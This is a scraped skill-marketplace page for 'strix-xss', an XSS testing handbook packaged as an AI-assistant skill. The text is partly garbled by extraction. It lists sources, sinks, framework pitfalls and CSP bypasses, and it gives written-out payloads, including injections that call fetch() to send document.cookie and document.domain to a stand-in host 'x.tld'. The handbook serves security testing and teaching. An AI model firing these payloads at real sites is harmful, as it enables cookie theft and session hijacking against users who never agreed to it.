원클릭으로
strix-xss
Strix XSS 测试手册,覆盖反射型、存储型、DOM 型向量与 CSP 绕过;触发名:strix-xss
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
메뉴
Strix XSS 测试手册,覆盖反射型、存储型、DOM 型向量与 CSP 绕过;触发名:strix-xss
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
SOC 직업 분류 기준
| name | Strix•XSS 测试 |
| description | Strix XSS 测试手册,覆盖反射型、存储型、DOM 型向量与 CSP 绕过;触发名:strix-xss |
Cross-site scripting persists because context, parser, and framework edges are complex. Treat every user-influenced string as untrusted until it is strictly encoded for the exact sink and guarded by runtime policy (CSP/Trusted Types).
Types
Contexts
Frameworks
Defenses to Bypass
Server Render
Client Render
innerHTML/outerHTML/insertAdjacentHTML, template literalsdangerouslySetInnerHTML, v-html, $sce.trustAsHtml, Svelte {@html}URL/DOM
location.hash/search, document.referrer, base href, data-* attributesEvents/Handlers
onerror/onload/onfocus/onclick and javascript: URL handlersCross-Context
File/Metadata
< > & " '" ' < > & and ensure attribute quoted; avoid unquoted attributesJSON.stringifyurl() and expression()Sources
location.* (hash/search), document.referrer, postMessage, storage, service worker messagesSinks
innerHTML/outerHTML/insertAdjacentHTML, document.writesetAttribute, setTimeout/setInterval with stringseval/Function, new Worker with blob URLsVulnerable Pattern
const q = new URLSearchParams(location.search).get('q');
results.innerHTML = `<li>${q}</li>`;
Exploit: ?q=<img src=x onerror=fetch('//x.tld/'+document.domain)>
Leverage parser repairs to morph safe-looking markup into executable code (e.g., noscript, malformed tags):
<noscript><p title="</noscript><img src=x onerror=alert(1)>
<form><button formaction=javascript:alert(1)>
Server or client templates evaluating expressions (AngularJS legacy, Handlebars helpers, lodash templates):
{{constructor.constructor('fetch(`//x.tld?c=`+document.cookie)')()}}
data: blob: allowed, inline events allowedKeep a compact set tuned per context:
<svg onload=alert(1)>" autofocus onfocus=alert(1) x="onmouseover=alert(1)"-alert(1)-"javascript:alert(1)dangerouslySetInnerHTMLv-html and dynamic attribute bindings$sce trust APIs misused to whitelist attacker content{@html} and dynamic attributesjavascript: in links and submit actionstext/html or image/svg+xml can execute inlineContent-Disposition: attachmentX-Content-Type-Options: nosniffContext + sink decide execution. Encode for the exact context, verify at runtime with CSP/Trusted Types, and validate every alternative render path. Small payloads with strong evidence beat payload catalogs.
面向中文用户和新手的统一入口,保持原有两种模式:1) 自动分流,2) 先头脑风暴再分流。分流目标既可以是 ctf-*,也可以在 Web/接口/漏洞验证阶段增强到 strix-*;适合不知道该用哪个 skill、想先理清题意、又不想自己先判断何时该切到工具链或漏洞专项的场景;触发名:ctf-beginner-hub
面向 CTF 新手与综合题的统一总控 skill。保持原有两种主模式:1) 自动分流,2) 先头脑风暴再分流。分流目标既可以是 ctf-*,也可以在 Web/接口/漏洞验证阶段增强到 strix-*;适合不知道该用哪个 skill、想边做边学、又不想自己先判断何时切换到工具链或漏洞专项的场景;触发名:ctf-super-hub
Strix JWT 与 OIDC 安全测试手册,覆盖令牌伪造、算法混淆与声明篡改;触发名:strix-authentication-jwt
给中文用户和新手用的 Strix Lite 统一入口:先判断该用哪一个 strix-* 工具或漏洞测试 skill,再给最小化起手步骤;适合在 Web 安全测试、工具链使用、漏洞验证时不知道先用哪个 Strix skill 的场景;触发名:strix-beginner-hub
Strix 功能级授权缺陷测试手册,覆盖操作级权限失效、管理功能越权与 API 操作绕过;触发名:strix-broken-function-level-authorization
Strix 业务逻辑漏洞测试手册,覆盖流程绕过、状态操控与领域约束破坏;触发名:strix-business-logic